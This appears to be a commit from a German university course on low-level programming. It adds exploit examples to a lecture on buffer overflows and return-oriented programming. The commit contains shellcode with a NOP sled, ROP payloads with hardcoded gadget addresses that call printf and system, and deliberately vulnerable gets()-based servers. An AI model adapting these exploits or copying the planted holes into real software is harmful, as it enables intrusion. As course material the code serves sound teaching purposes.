Exploits: Beispiel-Programme

20170102/exploit-1.c

+#include <unistd.h>
+
+int main (int argc, char **argv)
+{
+  for (int i = 2; i < 50; i++)
+    write (1, "\x90", 1);                // nop
+  write (1, "\x48\x83\xec\x60", 4);      // sub    $0x60,%rsp
+  write (1, "\x48\x89\xe7", 3);          // mov    %rsp,%rdi
+  write (1, "\xb8\x00\x00\x00\x00", 5);  // mov    $0x0,%eax
+  write (1, "\xe8\x26\xfe\xff\xff", 5);  // callq  0x4003e0 <printf@plt>
+  write (1, "\xeb\xfe", 2);              // while (1);
+  write (1, "\n", 1);
+  return 0;
+}

20170102/exploit-2.c

+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x4005fd;
+  uint64_t add_offset_to_edi = 0x400604;
+  uint64_t dummy = 0;
+  uint64_t printf_address = 0x4004a0;
+  uint64_t exit_address = 0x4004d0;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "I 0WN U!!1!                             "
+                      "                                             ";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_edi, 8);
+  write (1, &printf_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}

20170102/exploit-3.c

+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x4005fd;
+  uint64_t add_offset_to_edi = 0x400604;
+  uint64_t dummy = 0;
+  uint64_t system_address = 0x400611;
+  uint64_t exit_address = 0x4004d0;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "gimp";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_edi, 8);
+  write (1, &system_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}

20170102/hp-20170102.tex

@@ -31,7 +31,7 @@
 
 \title{Angewandte Informatik\\Hardwarenahe Programmierung}
 \author{Prof.\ Dr.\ rer.\ nat.\ Peter Gerwinski}
-\date{2.\ Januar 2016%
+\date{2.\ Januar 2017%
   \begin{picture}(0,0)
     \color{red}
     \put(1.75,1.5){\begin{rotate}{10}\LARGE\bf SPECIAL\end{rotate}}
@@ -54,6 +54,7 @@
   \begin{itemize}
     \item[\textbf{U}] \textbf{Software und Urheberrecht}
       \begin{itemize}
+        \color{red}
         \item[U.1] Überblick
         \item[U.2] Lizenzmodelle
         \item[U.3] Beispiel-Lizenzen
@@ -61,6 +62,7 @@
       \end{itemize}
     \item[\textbf{X}] \textbf{Exploits}
       \begin{itemize}
+        \color{red}
         \item[X.1] Einfache Angriffe
         \item[X.2] Puffer-Überläufe
         \item[X.3] Return-Oriented Programming
@@ -605,6 +607,7 @@
   \begin{itemize}
     \item[\textbf{U}] \textbf{Software und Urheberrecht}
       \begin{itemize}
+        \color{medgreen}
         \item[U.1] Überblick
         \item[U.2] Lizenzmodelle
         \item[U.3] Beispiel-Lizenzen
@@ -612,6 +615,7 @@
       \end{itemize}
     \item[\textbf{X}] \textbf{Exploits}
       \begin{itemize}
+        \color{red}
         \item[X.1] Einfache Angriffe
         \item[X.2] Puffer-Überläufe
         \item[X.3] Return-Oriented Programming
@@ -762,6 +766,7 @@
 
     \begin{tabular}{|c|}
       \dots \\\hline
+      \only<2->{Schadcode \\\hline}
       Rücksprung zum \alt<2->{Schadcode}{Betriebssystem} \\\hline
       \lstinline,buffer[], \\\hline
     \end{tabular}
@@ -841,6 +846,31 @@
     \put(0.5,0.2){\begin{rotate}{10}\Large\bf SPECIAL\end{rotate}}
   \end{picture}}
 
+\begin{frame}
+
+  \shownosectionnonumber
+
+  \begin{itemize}
+    \item[\textbf{U}] \textbf{Software und Urheberrecht}
+      \begin{itemize}
+        \color{medgreen}
+        \item[U.1] Überblick
+        \item[U.2] Lizenzmodelle
+        \item[U.3] Beispiel-Lizenzen
+        \item[U.4] Fazit
+      \end{itemize}
+    \item[\textbf{X}] \textbf{Exploits}
+      \begin{itemize}
+        \color{medgreen}
+        \item[X.1] Einfache Angriffe
+        \item[X.2] Puffer-Überläufe
+        \item[X.3] Return-Oriented Programming
+        \item[X.4] Fazit
+      \end{itemize}
+  \end{itemize}
+
+\end{frame}
+
 \begin{frame}
 
   \shownosectionnonumber

20170102/server-1.c

+#include <stdio.h>
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}

20170102/server-2.c

+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+  asm ("mov $0, %eax");
+  asm ("add $0x28, %rsp");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("mov %rsp, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("add $0x20, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  system ("clear");
+  exit (0);
+}
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}

20170102/test-asm.c

+int main (void)
+{
+  char msg[] = "I 0WN U!!1!                             "
+               "                                             ";
+  asm ("sub $96, %rsp");
+  asm ("mov %rsp, %rdi");
+  asm ("mov $0, %eax");
+  asm ("call printf");
+  asm ("add $96, %rsp");
+  return 0;
+}

20170102/test-c.c

+#include <stdio.h>
+
+int main (void)
+{
+  char msg[] = "I 0WN U!!1!                             "
+               "                                             ";
+  printf (msg);
+  return 0;
+}